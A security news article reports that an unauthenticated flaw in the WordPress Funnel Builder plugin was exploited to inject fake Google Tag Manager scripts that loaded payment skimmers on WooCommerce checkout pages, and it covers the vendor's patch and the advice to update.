Critical Vulnerability Discovered in WordPress Funnel Builder Plugin
A significant security vulnerability affecting the Funnel Builder plugin for WordPress has been actively exploited, allowing malicious actors to inject harmful JavaScript code into WooCommerce checkout pages. This alarming situation has raised concerns over the potential theft of sensitive payment information from unsuspecting customers.
Sansec, a Dutch e-commerce security company, recently published details about this vulnerability. Currently, there is no official Common Vulnerabilities and Exposures (CVE) identifier associated with it. The flaw, which affects all versions prior to 3.15.0.3, impacts over 40,000 WooCommerce sites. The vulnerability enables unauthenticated attackers to embed arbitrary JavaScript code into checkout pages, significantly increasing the risk of fraud.
The primary mechanism of this attack involves the injection of code masquerading as legitimate Google Tag Manager scripts within the plugin’s “External Scripts” settings. These deceptive scripts operate alongside authentic tags but are designed to load a payment skimmer, capturing credit card numbers, CVVs, and billing addresses during the checkout process.
According to Sansec, the vulnerability stems from a publicly exposed checkout endpoint that does not verify caller permissions or restrict method access in older plugin versions. This flaw allows attackers to issue unauthenticated requests that directly manipulate the plugin’s global settings by injecting malicious code into every Funnel Builder checkout page.
In one documented instance, Sansec observed an attack payload disguising itself as a Google Tag Manager loader. The infiltrated script initiates a connection to the attacker’s command-and-control (C2) server to download a tailored skimmer specific to the compromised storefront. The primary goal of this operation is to collect sensitive financial information entered by customers during checkout.
Website owners utilizing the Funnel Builder plugin are advised to update to the latest version immediately and to scrutinize their external scripts for any unfamiliar entries that could pose a security risk. Experts highlight that disguising skimming scripts as trusted tracking tags is a common tactic among attackers, making it imperative for merchants to maintain vigilant oversight of their plugins.
This disclosure follows recent reports of similar attacks targeting Joomla websites, where obfuscated PHP code backdoors were found, allowing attackers to serve spam content and manipulate site behavior. Such tactics exemplify the evolving landscape of cyber threats and the persistent need for robust security measures.
In response to the identified vulnerability, FunnelKit, the plugin maintainer, implemented a patch within 36 hours of initial reports, collaborating with the WordPress.org team to auto-update existing installations. The company further emphasized its commitment to cybersecurity by backporting this fix to earlier versions and blocking known attacker domains at the DNS level to diminish the attack vectors.
FunnelKit reported that the active exploitation path is now closed, with stores running version 3.15.0.3 or later being shielded from the threat. Their recent monitoring reveals that only a limited number of sites showed signs of compromise, attributing the contained impact to the rapid deployment of the patch and preventive measures taken against the attack infrastructure.
This incident underscores the vital importance of consistent updates and the proactive management of plugins to protect against emerging cyber threats. As businesses continue to navigate the complexities of digital commerce, vigilance and swift response to cybersecurity vulnerabilities remain paramount.